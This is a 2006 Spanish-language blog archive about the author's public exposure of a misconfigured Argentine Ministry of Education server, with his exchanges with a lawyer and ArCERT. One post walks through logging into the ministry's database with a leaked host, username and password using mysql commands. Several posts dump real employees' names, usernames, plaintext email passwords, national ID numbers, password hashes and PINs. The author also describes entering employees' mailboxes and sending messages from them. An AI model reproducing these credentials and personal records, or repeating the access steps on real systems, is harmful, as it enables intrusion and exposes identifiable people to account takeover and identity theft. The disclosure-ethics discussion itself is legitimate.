Sebastian Bassi (aka Bloguero Connor): 01/01/2006

BrokenFunction.com / Megaman vs Ghosts 'n Goblins / SWF

Lo que resulta de mezclar el Ghost'n Goblins y el Megaman:

BrokenFunction.com / Megaman vs Ghosts 'n Goblins / SWF

CodeDragon Home

CodeDragon Home

Esta verde aun, pero es para tener en cuenta.

Scorpion Lives for 15 Mo. Inside Fossil

Scorpion Lives for 15 Mo. Inside Fossil

Por si quedaba dudas de lo guachos que pueden ser estos bichos.

Mas repercusiones por el caso del ME

Hoy recibí este mensaje que me pareció lo suficientemente interesante para postearlo aca y dar una respuesta publica porque son varios quienes me escriben con el mismo tenor, asi que sera una especie de FAQ:

From: Pablo Palazzi
To: "sbassi+solar@gmail.com"
Date: Jan 27, 2006 11:55 AM
Sebastian
Alguien mando a la lista del foro de habeas data un link tuyo donde develas
cierta informacion privada del ministerio de educacion de argentina. Te
comento que si bien entiendo la finalidad de lo que hiciste, se podria
consiedad que mas alla de que fue con fines de experimentacion seria un
acceso ilegitimo a una base de datos personales, que es un delito previsto
en el art. 157 bis del codigo penal. Mi consejo legl seria que borres todo
rápido antes de que la gente del ministerio se entere y quedes en
problemas....

Pablo A. Palazzi
CABANELLAS, ETCHEBARNE, KELLY & DELL'ORO MAINI
San Martin 323, piso 17 - Buenos Aires - C1004AAG
Tel + 5411 4114-5538
Fax + 5411 4114-5555
e-mail: p.palazzi@cekd.com
http://www.cekd.com/
______________________________
________________
Este mensaje es estrictamente confidencial. Puede contener informacion
amparada y protegida por el secreto profesional. Si usted ha recibido este
e-mail por error, por favor comuniquese inmediatamente via e-mail a
"cekd@cekd.com" y elimínelo de su sistema. Este mensaje no puede ser
copiado ni divulgado su contenido a ninguna persona. Muchas gracias.
This message is strictly confidential. It may also be privileged or
otherwise
protected by work product immunity or other legal rules. If you have
received
it by mistake please let us know by reply or to "cekd@cekd.com" and then
delete it from your system. You should not copy the message or disclose its
contents to anyone. Thank you.
______________________________________________

Por empezar se ve que todavía la gente no aprendió que para que yo considere una carta o email confidencial, primero tengo que ponerme de acuerdo que asi lo es. Generalmente si alguien me pide confidencialidad, lo acepto. Pero si lo piden, no si me la quieren imponer. Despues de todo, es mi correo. Igual en este caso en particular, creo que ese "footer" se lo pone el servidor de su lugar de trabajo y no creo que el se lo crea, ya que me consta que es una persona inteligente y que sabe del tema.
Ahora, al tema en si, voy a publicar aca mi respuesta:

Algunos lo interpretan asi, yo no. Yo no considero que sea informacion privada desde el momento en que el mismo Ministerio la publica en internet. Para cuando yo publiqué ese mensaje, hacia 2 dias que en un foro H/P/C circulaba el dump de TODA la base, asi que menos se puede argumentar que los datos eran privados.
El problema es que quien puede hacer la denuncia, es el afectado, ya sea el ministerio o sus empleados. Si el Ministerio hiciera la denuncia, deberian denunciar a sus administradores porque son ellos quienes incumplieron el art. 2. Y eso no lo van a hacer. Los empleados, supongo que se la agarraran primero con el responsable, o sea, los admisnitradores del sistema, no conmigo que les avise. Y si lo mio es pasible de sancion, tambien lo seria todos los del mencionado foro de H/P/C que se estuvieron divirtiendo con los datos por 48hrs.
Por suerte en el ME ya se enteraron, de hecho esa fue la idea de publicar esto en BarraPunto (uno de los sitios mas leidos de habla hispana en temas tecnicos). Un funcionario de la jefatura de gabinete agradecio mi aviso y gracias a este se solucionó el problema. Caso contrario, seguramente se hubiesen hecho un festin haciendo datamining con eso y seguro que no paraban hacer hacer un 0wn de todo el gobierno.

Nuevamente agradesco tu intencion, me parecio muy interesante tu email, por lo que lo voy a publicar en mi blog.
Saludos,
SB.

Comentario final: Me dice que oculte la evidencia ("borres todo
rápido antes de que la gente del ministerio se entere"), que lindo consejo :)

PS: Acabo de ver que tiene un blog de derecho en internet, asi que si alguien lo quiere ver, dejo el link aca: Derecho en Internet.

Para tener en cuenta: Debian Administration :: Rolling your own Debian packages (part 1)

Debian Administration :: Rolling your own Debian packages (part 1)

Video chino: Guang Liang - Tong Hua

Esta bueno, y subtitulado en inglés.

interBANKING - ( Build 200512141538)

[Esto parece phishing made in Argentina, que opinan?]

La Pampa: fotografían y "escrachan" a los vecinos que cometen infracciones

[Es una lastima que no publiquen las patentes y las caras de las personas, ya que estacionar el auto en la calle es un acto público, por lo que no deberian reclamar "protección de indentidad"]

Actualización sobre "el hackeo" al Ministerio de Educación

Ante todo quiero agradecer a la gente que me ha aconsejado durante este asunto, ya sea con opiniones a favor o en contra de mi proceder. Otro que se merece mi gratitud es Candyman, editor de Barrapunto, por tener los cojones para publicar mi nota en un sitio tan importante (al menos para los geeks). Tambien destaco su comentario, en donde se ve claramente que entendio mi intención.
Si alguien aun no sabe de que estoy hablando, es hora que lea "Los datos del Ministerio de Educación argentino, al descubierto".
Primero voy a exponer los nuevos hechos desde esa publicacion, luego responderé algunos cuestionamientos que mi hicieron, y para terminar, una reflexión final.

Las novedades:

Aproximadamente a las 10 AM del Jueves el agujero fue tapado. La publicacion en /. fue a la noche del Miercoles (ya era Jueves en España). Entre los comentarios en /. y en el blog, habia uno que decia ser del ArCERT, donde me instaba a hacer ahi la denuncia, que eso es lo que tendria que haber hecho. Muy bien, no lo sabia, asi que segui las instrucciones y le envie un email usando la clave publica PGP de ellos. Esta fue la respuesta del ArCERT:

From: InfoMail de ArCERT Mailed-By: arcert.gov.ar

To: Sebastian Bassi

Cc: InfoMail de ArCERT

Date: Jan 12, 2006 1:11 PM

Subject: Re: Denuncia sobre problema de seguridad en el Ministerio de Educacion.
Estimado Sebastian,
hemos recibido tu mensaje correctamente.

Te informamos que ya habiamos tomado conocimiento del mismo y ya hemos hablado con los administradores del ministerio de educacion que estan trabajando en el tema.

Con respecto a tu publicación, podemos mencionarte:
- es algo cuestionable el hecho de hacer publica la falla ante la falta de
respuesta ante el vio de un mail....pero bueno, queda a la descicion personal

- pero el hecho de que hayas hecho publicado informacion "confidencial" en tu
reporte, viola lo establecido en la Ley de Proteccion de Datos Personales
Argentina (Habeas Data - Ley Nº 25.326)
[http://infoleg.mecon.gov.ar/infolegInternet/verNorma.do?id=64790 ]
y es plausible de sanciones (tanto monetarias, como penales).

Esto te lo mencionamos, a fin de que tengas en cuenta de que el M.Educacion
puede llegar a decir inciar algún tipo de acción legal. (obviamente, bajo la Ley
de Habeas Data tanto el administrador de la base de datos como el responsable
del centro de computos del Ministerio, son tambien plausibles de sanciones).

Gracias por tu contacto y reporte.

Ante cualquier inquietud, no dudes en consultarnos.
El Equipo de ArCERT

------------------------------
-----------------------------------------
ArCERT es un grupo de respuesta y asistencia a organismos de la
Administración Pública en temas relacionados con seguridad informática
(www.arcert.gov.ar ), que funciona en la Subsecretaría de la Gestión
Pública de la Jefatura de Gabinete de Ministros.

La Resolución SFP Nro. 81/99 establece como algunas de nuestras funciones:
- Centralizar los reportes sobre incidentes de seguridad ocurridos en la
APN y facilitar el intercambio de información para afrontarlos.
- Proveer un servicio especializado de asesoramiento en seguridad de
redes.
- Promover la coordinación entre los organismos de la APN para prevenir,
detectar, manejar y recuperar incidentes de seguridad.
- Actuar como repositorio de toda la información sobre incidentes de
seguridad, herramientas y técnicas de protección.

En otro aspecto, dada la característica de nuestra actividad, entablamos
contactos e intercambio con equipos de seguridad de otros países y
organizaciones relacionadas. Estos reportan frecuentemente información
acerca de "vulnerabilidades" y "sitios hackeados".

Cabe mencionar que ArCERT, no pretende investigar la causa de los ataques ni
quienes son sus responsables. Corresponde al responsable de cada organismo
efectuar las denuncias para iniciar el proceso de investigación ante la
justicia. Los reportes y organismos implicados de incidentes son tratados como
información confidencial y no son divulgados a terceros.

Asimismo, cabe destacar que los servicios que presta el ArCERT son gratuitos
y se circunscriben al ámbito del sector público.

Por todo lo expuesto lo invitamos a visitar nuestro web site
WWW.ARCERT.GOV.AR y nos ponemos a su disposición para responder a
cualquier consulta o solicitud de asistencia técnica.

--
-----------------------------------------------
ArCERT - http://www.arcert.gov.ar

Te: (54-11) 4343-9001 int.512/514 | 4345-0383
Fax:(54-11) 4343-7458

Av.R. Saenz Peña 511 - Of:514
C1035AAA - Ciudad Autonoma de Buenos Aires
Argentina
-----------------------------------------------
APN y facilitar el intercambio de información para afrontarlos.
- Proveer un servicio especializado de asesoramiento en seguridad de
redes.
- Promover la coordinación entre los organismos de la APN para prevenir,
detectar, manejar y recuperar incidentes de seguridad.
- Actuar como repositorio de toda la información sobre incidentes de
seguridad, herramientas y técnicas de protección.

En otro aspecto, dada la característica de nuestra actividad, entablamos
contactos e intercambio con equipos de seguridad de otros países y
organizaciones relacionadas. Estos reportan frecuentemente información
acerca de "vulnerabilidades" y "sitios hackeados".

Cabe mencionar que ArCERT, no pretende investigar la causa de los ataques ni
quienes son sus responsables. Corresponde al responsable de cada organismo
efectuar las denuncias para iniciar el proceso de investigación ante la
justicia. Los reportes y organismos implicados de incidentes son tratados como
información confidencial y no son divulgados a terceros.

Asimismo, cabe destacar que los servicios que presta el ArCERT son gratuitos
y se circunscriben al ámbito del sector público.

Por todo lo expuesto lo invitamos a visitar nuestro web site
WWW.ARCERT.GOV.AR y nos ponemos a su disposición para responder a
cualquier consulta o solicitud de asistencia técnica.

--
-----------------------------------------------
ArCERT - http://www.arcert.gov.ar

Te: (54-11) 4343-9001 int.512/514 | 4345-0383
Fax:(54-11) 4343-7458

Av.R. Saenz Peña 511 - Of:514
C1035AAA - Ciudad Autonoma de Buenos Aires
Argentina
-----------------------------------------------

Unas horas mas tade, me escribio Ricardo Pluss de la Oficina Nacional de Tecnologias Informaticas, con este mensaje:

From: Ricardo Pluss Mailed-By: sgp.gov.ar

To: sbassi+bp@gmail.com

Date: Jan 13, 2006 4:35 PM

Subject: M. de Educación

Sebastián:

Ayer a mediodía, a raíz de tu mensaje me contacté con el responsable
técnico de los servidores web del Ministerio, Marcelo de Angelis, quien
me contó que se habían enterado del problema y que estaban tratando de
solucionarlo.
En nombre de Marcelo agradezco tu colaboración.

Saludos

--
Ricardo Pluss
Oficina Nacional de Tecnologías Informáticas
Av. Roque Saenz Peña 511 piso 5º oficina 507
011-4343-9001 interno 522

Sobre los mensajes en el blog, contestare asi en general segun los temas:
1- "Esto no es lo que haria un consultor de seguridad informatica".
OK, puede ser, ¿Y que?. ¿Hay que ser consultor de seguridad informatica para reportar una filtracion de datos?. Soy estudiante de Biotecnologia que trabaja en bioinformatica, no soy ni quiero ser "consultor de seguridad". Volviendo a mi pregunta, creo que cualquiera deberia poder denunciar una cosa asi, sin ser un "experto". Ahora bien, como se supone que uno que no sepa del tema pueda ayudar? Dejo la pregunta abierta.
2- "Vas a ir preso por publicar datos personales" (tambien "ojala te pudras en la carcel").
En Argentina es dificil que alguien vaya preso por un delito menor. Hemos visto hasta repartijas de coimas por TV y nadie fue preso. En el peor de los casos, el delito que me adjudican tiene una pena de hasta 2 años de presion, que al no tener antecedentes penales, no hay cumplimiento de condena (en Argentina por delitos con penas menores de 3 años, sin antecedentes, no hay "cumplimiento efectivo", o sea, inpunidad garantizada).
3- "No deberias haber mostrado los datos" "podias haber puesto asteriscos" "podrias haber puesto una captura de pantalla" etc.
Creo que el hecho de haber mostrado los datos aca, es irrelevante a la hora de protejer los datos personales de los afectados. Quien publicó los datos en primer lugar fue el Ministerio de Educación. Si yo accedi, es porque estaban disponibles, porque ellos lo publicaron. Asi que no me vengan ahora con que los datos eran privados. De hecho la ley dice que la sancion sera para quienes: "Revelare a otro información registrada en un banco de datos personales cuyo secreto estuviere obligado a preservar por disposición de una ley.". O sea, esto es para quienes tenian obligacion de guardar el secreto. No es mi caso. Ni tampoco el del Zorro, que fue quien se dio cuenta del problema.
4- "¿Teniendo los datos de 1300 empleados, como no los usaste para avisarles?".
Si los use. Nunca dije que no los habia usado. Entre en varias casillas y respondi mensajes colectivos explicando la situacion. Incluso conteste un spam que habia recibido una trabajadora del Ministerio. Contesté con copia a todos (porque estaban en el CC varios usuarios del Ministerio), pidiendo informacion con respecto al tamanio y precio del producto (un consolador). Esto deberia haber llamado la atención. :)
5- "Tu si ves un coche abierto y el duenho no te coge el telefono no le dices donde esta el coche a todo el mundo para que el duenho aprenda lo que es bueno no? es que hay que ser cabron :)".
Es buena comparacion. Supongamos que el coche abierto esta en el estacionamiento de un estadio de futbol. Y veo que otros ya vieron que el coche estaba abierto, no fui yo el unico. Entonces aviso al locutor del estadio para que anuncie por los parlantes sobre el problema. Eso causara que el dueño lo solucione. Si causa que alguno lo robe, bueno, es culpa del ladron y responsabilidad de quien dejo la puerta abierta, pero no mia que avise, porque robar podian robar igual desde que dejan la puerta abierta y desde que ya existia gente que sabia del problema.

Reflexión final:

Como dije en el primer mensaje, aca hay una cadena de errores para llegar a esto. No soy quien para juzgar lo que a primera vista es una gran incompetencia del Ministerio de Educacion. Si puedo evaluar mi responsabilidad o mi manera de actuar. Si bien el problema fue resulto gracias a mi mensaje en BarraPunto, no hay duda podria haber hecho las cosas de mejor manera, como por ejemplo, avisando al ArCERT cuando el ME no respondio a mis mensajes. Creo que tambien hay algunas fallas de parte del estado. Porque problemas de seguridad, siempre va a haber. En todos lados. Lo que podrian mejorar es el aspecto de comunicacion. Si ponen un formulario para contacto en una pagina, lo menos que tienen que hacer es leer lo que envian por ese formulario. Sino, para que esta ese formulario? Obviamente es para aparentar que escuchan a los ciudadanos. A menos que quieran creer que lo leyeron y no les importo, lo que seria peor. Y si no van a leer eso (porque llegan muchos mensajes me han dicho por ahi), deberian habilitar un link o un email especial para reportar problemas de seguridad. Por otra parte el ArCERT deberia tener un poco mas de publicidad, apostaria que el 99,99% de los argentinos no saben que eso existe. Ni siquiera quienes trabajan con computadoras (salvo algunos en seguridad informatica). Tambien la gente del ArCERT podria firmar electronicamente sus emails y sobre todo, dar un nombre, al menos a mi me gusta saber con quien estoy hablando. No creo tener la razon en esto, pero al menos creo que si hace falta un debate o al menos un intento de reglas claras sobre que hacer en estos casos. Si veo un delito, tengo que informar a la policia, si veo un incendio, a los bomberos, pero si veo una filtracion de datos en una pagina del estado, a quien hay que llamar? Lo logico es llamar a la reparticion afectada, pero si no responden, como este caso, a quien? Aparentemente, es al ArCERT, pero eso deberia, para mi, estar notificado en algun lado.

En USA también pasa: Web Site of Agency Is Called Insecure - New York Times

Gracias Javier por mostrarme esta nota:

Web Site of Agency Is Called Insecure - New York Times

Bases contradictorias?

Me parece que en este reglamento al concurso de DirecTV hay una contradicción:

II. De la Participación.

8. Podrán participar los abonados al Servicio DIRECTV™ con domicilio de instalación dentro de la República Argentina

Con esta parte:

14. El Concurso no reviste la calidad de concurso o certamen en los términos del artículo 10 de la Ley 22.802 toda vez que la participación en el mismo no se condiciona en modo alguno a la contratación del Servicio DIRECTV™.

Y si quedan dudas, podemos ver esto:

(en el mismo art. 8) No podrán participar los abonados que se hubieran suscripto al Servicio DIRECTV™ con posterioridad al 30 de octubre de 2005.

No solo hay que ser abonado, sino que hay que serlo desde antes esa fecha. ¿Entonces en que quedamos? La participación no se condiciona al a contratación del servicio pero hay que suscribirse antes del 30 de Octubre. Incluso el art. 13 dice que pasa si uno no paga la cuota:

Cualquier falsedad o inexactitud en los datos aportados por el participante y/o la existencia de deuda relacionada con el Servicio DIRECTV™ y/o la pérdida de la condición de abonado, habilitarán a GEA a descalificar al participante y designar ganador a quien se hubiese posicionado inmediatamente detrás del ganador descalificado.

Otra cosa rara, aunque no ilegal, es que uno se puede registrar hasta el "1° de marzo de 2006" (art. 10), pero el concurso está vedado para quienes se suscriban al servicio "con posterioridad al 30 de octubre de 2005" (art.8). El motivo que puede tener esto es poner una fecha para "enganchar clientes" (Marzo 2006) aunque no puedan participar porque no se inscribieron al servicio antes del 30 de Octubre de 2005. Ademas, quines no se suscribieron antes de Octubre de 2005, pueden suscribirse al concurso y obtener su número de acceso, no sé para que.

Space Invader Shoe Review - Kotaku

En Febrero es mu cumpleaños, aca doy una idea de lo que me pueden regalar: Space Invader Shoe

No te metas

Cuando era chico escuchaba una frase que era tipica de esa epoca (la epoca de la dictadura militar en Argentina, tambien conocida como Guerra Sucia), la frase era "No te metas". La idea era que cada uno tenia que hacer lo suyo y no participar en nada para ayudar a otro. Esa frase-consejo venia muy bien en esos tiempos, donde "meterse" significaba participar en sindicatos, centros de estudiantes, partidos politicos (que estaban prohibidos) y organiaciones de derechos humanos. Evidentemente, a pesar de mas de 20 años de democracia, esto sigue vigente. Acabo de publicar en Barrapunto un fallo de seguridad informatica en el Ministerio de Educación y la mayoria de los comentarios son del tipo "vas a ir en cana, eso no se hace, si lo haces no tenes que dar tu nombre, borra urgente tu post en tu blog, etc, etc". Para colmo, la mayoria de los lectores de Barrapunto son españoles (si fueran argentinos, les entenderia, despues de tanto lavado de cerebro) lo que signfica que el "no te metas" tiene un alcance mayor del que yo creia, quizas sea un resabio de epocas pasadas, no se, pero me preocupa.

Como ver los datos personales de los empleados del Ministerio de Educación, en 3 pasos fáciles.

Como ver los datos personales de los empleados del Ministerio de Educación, en 3 pasos fáciles.

NOTA PARA SITIO WEB DE SOLAR.

La noche del 9 de Enero, un miembro de SOLAR que se hace llamar "Zorro", publicó la direccion de internet (URL) de un archivo perteneciente al Ministerio de Educacion (ME). Este archivo no deberia estar a disposición del público, ya que es de uso interno del servidor del ME. Lamentablemente, alguien en el ME configuró mal el servidor y ese documento quedó visible. Se trata de un archivo con extension .inc con codigo de programa (en lenguaje PHP), que en lugar de mostrarse, deberia ejecutarse y mostrarse el resultado de esta ejecución. Como el código estaba disponible, se podia leer, entre otras cosas, esta linea:

$link = mysql_connect("bdatos.me.gov.ar", "A_dsweb","EcSdrT");

Aca se expone informacion mas que interesante, a saber:

1. Direccion de la base de datos del ME, en este caso:
2. Nombre de un usuario.
3. Contraseña de ese usuario.

A esta altura, un miembro de la lista de SOLAR dice que de poco sirve esa información, ya que lo razonable seria que uno no pueda acceder a la base de datos desde un dominio de internet no autorizado. No siempre lo razonable es lo que pasa, la vida nos da sorpresas, y en este caso, compruebo que el servidor es accesible desde cualquier lugar de internet (no creo que mi dominio sea un dominio autorizado, por lo que supongo que no existe restriccion de acceso por lugar).
Para comprobarlo, uso este comando:

sbassi@vicky2:/home/vicky $ mysqladmin -h bdatos.me.gov.ar -u A_dsweb -pEcSdrT ping

Y obtengo como respuesta:

mysqld is alive

Al momento de escribir esto, 11 de Enero de 2006, todavia funciona, lo que significa que aun no han cambiado la contraseña. Espero que gracias a esta nota lo hagan.

Esto ya parecia preocupante. Para ver la magnitud del problema, exploré el contenido de esa base de datos, para determinar si estaban expuestos datos confidenciales. Primero me conecté a la base de datos, usando el programa MySQL que tengo instalado en mi Ubuntu Linux:

sbassi@vicky2:/home/vicky $ mysql -h bdatos.me.gov.ar -u A_dsweb -pEcSdrT

Con esto ya estaba adentro. Luego mire que bases habia presente:

mysql> show databases;
+----------+
| Database |
+----------+
| dsweb |
+----------+
1 row in set (0.05 sec)

Inmediatamente entre a esa base y listé sus tablas:

mysql> use dsweb;
mysql> show tables;
+------------------+
| Tables_in_dsweb |
+------------------+
| accesos |
| agetel |
| asignot |
| autores |
| ceremonial1 |
| ceremonial2 |
| ceremonial3 |
| ceremonial4 |
| ceremonial5 |
| claves |
| claves_ |
| congreso3aap |
| contadores |
| cuadros |
| departamentos |
| desenlaces |
| desenlaces2 |
| despacho |
| direcciones |
| dispositivos |
| edificios |
| enlaces |
| eventos |
| hweb |
| ife |
| mail |
| maquinas |
| ncos |
| ncos01 |
| ncos02 |
| ncos03 |
| ot_maq |
| prueba |
| sitios |
| soporte |
| soporte01 |
| soporte02 |
| tecnicas |
| tel_dependencias |
| tel_usuarios |
| tempo1 |
| tramix |
+------------------+
42 rows in set (0.09 sec)

mysql>

El siguiente paso es explorar el contenido de las tablas que parecen mas interesantes (claves, mail, etc). En el caso de mail, pude obtener informacion confidencial con la siguiente consulta de MySQL:

mysql> select nombre,usuario,clave from mail;

El resultado de esta consulta es muy largo como para publicar aca, basicamente se trata de los nombres completos, nombres de usuario y clave de correo de mas de 1300 empleados del ME.

Como muestra, publico algunas lineas:

| Aníbal Renzulli | arenzulli | 1532rzl |
| Nélida María Razzotti | nrazzotti | 861nlt |
| Programa Calidad Univ. | spucalidad | QlT9130 |
| Prog. Calidad Universitaria | spuciclos | Cspu205 |
| Andrea Rossi | arossi | 1161 |

Esto es grave. Con esta informacion podemos revisar el correo electronico de los empleados del ME. Para hacerlo hay que autenticarse en su webmail, que queda en: https://webs.me.gov.ar/WebMEil/index.php (la direccion fue obtenida usando el propio buscador del ME, no es ningun secreto). Lo sorprendente en este caso es que las claves esten "abiertas", esto es, en texto plano, listas para usar. Normalmente se guarda un "hash" (o firma) de la clave, pero no la clave en si. Este hash suele ser un codigo hexadecimal producto de algun algoritmo que "encripta" las claves en una sola via (o sea, no puede usarse el producto o hash para recomponer la clave) como el MD5. Esto tampoco es infalible, ya que hay utilidades como md5crack que prueban por fuerza bruta distintas contraseñas hasta encontrar una coincidencia entre el hash y la contraseña. Incluso hay servicios via Web que hacen algo similar (http://www.securitystats.com/tools/hashcrack.php , http://gdataonline.com/seekhash.php). A pesar de no ser una tecnica 100% segura (la probabilidad de romper la contraseña depende inversamente de la longitud y complejidad de la misma), es por lejos una mejor solución que almacenar las contraseñas en texto plano.
Si ademas quieren los telefonos personales y DNI, pueden obtenerlo con:

mysql> select * from mail;

La salida de este comando es logicamente mas completa que el anterior, por lo que tampoco sera publicado. En ambos casos tuve que ampliar el buffer de mi Gnome Terminal para poder capturar toda la salida (mas de 700Kb). Aqui muestro un fragmento al azar del resultado de esta consulta:

| | Avda. Santa Fe Piso 12 | NULL | Despacho | | 6236 | Fabricio Richiardi | 15:00hs. a 19:00hs. | frichardi | fbc938 | 12-08-05 | | 28.938.969 | |
| NULL | Dire. de G. C. y F. Docente | Lic. Alejandra Birgin | | Marcelo T. Alvear Piso 1° | NULL | 134 | | 7408 | Iván Alejandro S. Salgueiro | de 15:.ohs. a 19:00hs. | issalgueiro | 894ndr | 19-08-05 | | 92.894.155 | |
| NULL | Coordinación Gral. Estudios de Costos | Luisa Duro | | Avda. Santa Fe Piso 14° | NULL | frente | | 6277/1983 | Ana Beatriz Copes | 10:00hs. a 18:00hs. | acopes | trz152 | 19-08-05 | | 22.702.152 | |
| NULL | DINIECE | Margarita Poggi | | Paraguay Piso 2° | NULL | 202 | | 1448/1422 | Juan Pablo Rodriguez | 12:00hs. a 19:00hs. |

A esta altura de los acontecimientos estaba escribiendo a los responsables del ME, lo hice utilizando el formulario de contacto que esta en su página, pero hasta ahora no he tenido ninguna respuesta, a pesar que di ejemplos de la cantidad y calidad de informacion que se esta filtrando. Incluso publiqué en mi blog parte de la informacion, con la intencion de informar del problema, ya que estimo que cuanto mas gente sepa lo que esta pasando, antes será tapado el agujero.

Conclusiones:

Esta filtracion de datos no se produjo "por un error", sino por la sumatoria de 3 errores:

1. Publicacion del archivo .inc en lugar de su ejecución.
2. Base de datos sin limite de acceso.
3. Almacenamiento de claves sin encriptar.

Antes que alguien argumente que la publicacion del codigo fuente es un problema de seguridad (como critica al software libre), comento que no hay necesidad de incluir contraseñas en un codigo que es para distribucion. De hecho el problema surge aqui porque hay una distribucion involuntaria del codigo fuente. Si alguien se pregunta como encontraron ese código que supuestamente no estaba destinado al público, la respuesta es sencilla: Google. Mauro Lacy nos ilustró con este ejemplo de cadena de búsqueda .
Los resultados son nada mas ni nada menos que las páginas que no deberian verse dentro del dominio .gov.ar. Ante la controversia sobre si Google deberia dar esa informacion, opino que hay que tener en cuenta que el buscador es solo un mensajero, y que si tuvo acceso a esa información, es porque el operador la puso disponible como primera medida, Google solamente indexa siguiendo enlaces que son de acceso publico.
¿Que medidas deberian tomarse contra el administrador de sistemas del ME, que deja al desnudo todos los datos personales de los trabajadores? Es dificil opinar desde aca. Evidentemente se ha cometido un error (o varios segun como se vea) y el primero que debe responder es el encargado del area, pero como desconozco las condiciones de trabajo de esa persona (con que recursos cuenta, que libertad de accion tiene, etc) me parece apresurado emitir un juicio de valor sobre su responsabilidad.
El proposito de esta nota es ilustrar sobre los problemas de seguridad y alertar al ME sobre estos problemas, ya que a pesar de haberles escrito, no han dado ninguna respuesta. Como medida adicional de aviso, escribi a varios usuarios usando sus propias cuentas, ya que los usuarios al ser los mas afectados son quienes reclamarian ante quien corresponda. El hecho que sea época de vacaciones seguramente contribuye a que pasen los días sin que se solucione. La gente debe tomarse vacaciones, pero la seguridad, no.

Sebastian Bassi.
sbassi+solar@gmail.com

Ciberataques: ganó Linux

[INCREIBLE!!!!.

Según CLARIN IMFORMATICA, Linux padecio en el 2005 mas ataques de virus que Windows. Un disparate por donde se lo mire!. En realidad, citan un informe donde se ve que en Linux se han reportado mas vulnerabilidades que en Windows. Si eso es mas o menos inseguro es discutible, pero de ahi a decir que tuvo mas ataque de virus, un disparate! . El 99.999% de las máquinas que usan Linux no usa antivirus, simplemente porque no hay virus para Linux (en teoria existen, pero en la práctica no se propagan, son en su mayoria creacion de laboratorio o pruebas de concepto).

Es increible que un medio asi publique semejante inexactitud.

]

NewsForge | ISPConfig: A hosting control panel

Software de control de host, art. en newsforge: NewsForge | ISPConfig: A hosting control panel

Claves de email del ministerio a disposicion del publico

mysql> select nombre,usuario,clave from mail;

Mas informacion util del ministerio de educacion

Todo este post fue a parar aca.
El motivo es que un listado tan grande hacia que el blog tarde mucho en cargar.

Listado de Internos del Ministerio de Educacion

Si andan buscando llamar a alguien en el Ministerio de Educacion, este listado de internos les puede ser util:

mysql> select * from tel_usuarios;
+---------+--------------------------+---------------------------------+
| interno | apellido | nombre |
+---------+--------------------------+---------------------------------+
| 6143 | NULL | NULL |
| 6142 | Remorini | Cecilia |
| 6141 | Aggio | Carlos |
| 6140 | Remorini | Cecilia |
| 6138 | ALARMA | ALARMA |
| 6137 | ALARMA | ALARMA |
| 6136 | ALARMA | ALARMA |
| 6135 | Mueso | Rodolfo |
....
| 7990 | Conmutador Preatendedor | Conmutador Preatendedor |
| 7991 | Conmutador Preatendedor | Conmutador Preatendedor |
| 9113 | NULL | NULL |
+---------+--------------------------+---------------------------------+
1972 rows in set (6.57 sec)

mysql>

NOTA: Saqué los datos porque me hacia muy pesada la página, los puse aca.

Datos publicos del ME

El Ministerio de Educacion deja acceder a estos datos, pero no se que significan, quizas alguien con mas expriencia me pueda decir.

mysql> select * from claves;
+-----------------------+------------------+------------+---------+
| dentry | clave | fecha | permiso |
+-----------------------+------------------+------------+---------+
| Mario Diaz | 03efe0491d0b4199 | 2003-02-13 | T |
| Carlos Videtto | 0ba5db411cc5e551 | 2005-10-27 | T |
| Leonardo Blanco | 0b2f38e91df0ecf9 | 2003-02-13 | T |
| Edgardo Bombara | 7aa917815eb8b29a | 2003-05-19 | T |
| Hernán Suarez | 4722c29a0d47032b | 2003-02-13 | T |
| Roberto Muñoz | 0c89c91106519783 | 2003-12-23 | T |
| Vanesa Oubiñas | 46ec2d6b090bcc6f | 2003-02-13 | T |
| Raúl Gonzalez | 452ac4e70b6f0588 | 2003-02-13 | T |
| Alejandro Jaskolowski | 4468719e0c85555e | 2005-02-07 | T |
| Ana Cosentino | 1c25d7452704e65b | 2003-02-25 | O |
| Guillermo Navarrete | 47233a380d46782a | 2005-12-26 | A |
| Pablo Puñet | 1aaa9a0c41d303f9 | 2004-11-02 | T |
| Operador | 35988e01682262b7 | 2005-12-27 | T |
| J.Carlos Atrio | 79b62e40573b0a23 | 2004-03-26 | A |
| Daniel Farenga | 6c83cfa573c6b67f | 2005-04-21 | A |
| Fernando Silva | 5c9942207080e973 | 2003-02-13 | T |
| Hector Franchini | 0ab543a119a8ed2d | 2003-02-13 | T |
| Nestor Gassetti | 79b62e40573b0a23 | 2003-02-13 | T |
| Juan Gonzalez | 006aff0518875545 | 2003-02-13 | T |
| Mónica Ruiz | 45277bf70b74e433 | 2005-01-18 | A |
| Julian Ríos | 781b0302768364b0 | 2005-02-07 | T |
| Guido Bindi | 1b35d9942449407c | 2004-05-07 | T |
| Ana Bellomo | 45277cdf0b74dd1b | 2005-03-28 | A |
| Matias Fernández | 45271aba0b765d95 | 2005-05-03 | T |
| Enrique Cambours | 45a8f3df0dc5f19d | 2003-08-08 | O |
| Patricia Blanco | 4529ea1f0b70c8df | 2003-12-17 | T |
| Benetrix Gastón | 4526337a0b766474 | 2005-10-24 | T |
| De Angelis Marcelo | 452706cb0b7679a6 | 2005-10-24 | A |
| Montiel Guillermo | 452700820b76775d | 2005-10-24 | T |
| Rocchini Pablo | 45263e9f0b765f99 | 2005-10-24 | T |
| Ronquillo Angel | 45263f300b76602a | 2005-10-24 | T |
| Rosso Ricardo | 45277bf70b74e433 | 2005-10-24 | T |
| Borrajo Cristina | 45263d5d0b766257 | 2005-11-25 | O |
| Bernabé Crena | 45ec14590e096a2c | 2006-01-06 | T |
+-----------------------+------------------+------------+---------+
34 rows in set (0.05 sec)

mysql> select * from claves_;
+------------------------+-------+------------+
| dentry | clave | fecha |
+------------------------+-------+------------+
| Mario Diaz | 4682 | 0000-00-00 |
| Carlos Videtto | 4321 | 0000-00-00 |
| Leonardo Blanco | 2604 | 0000-00-00 |
| Edgardo Bombara | 2511 | 0000-00-00 |
| Gastón Benetrix | 0065 | 0000-00-00 |
| Hernán Suarez | 1973 | 2003-00-02 |
| Roberto Muñoz | 7777 | 0000-00-00 |
| Vanesa Oubiñas | 1406 | 0000-00-00 |
| Raúl Gonzalez | 1178 | 0000-00-00 |
| Angelica Gavilan | 6897 | 0000-00-00 |
| Ana Cosentino | 0826 | 0000-00-00 |
| Guillermo Navarrete | 1966 | 0000-00-00 |
| Susana Lamas | 4562 | 2003-00-02 |
| Elizabeth Barboza | 8624 | 0000-00-00 |
| Pablo Rochini | 6969 | 0000-00-00 |
| Juan Mauceri | 1006 | 0000-00-00 |
| Comodin | 7854 | 0000-00-00 |
| J.Carlos Atrio | 5445 | 0000-00-00 |
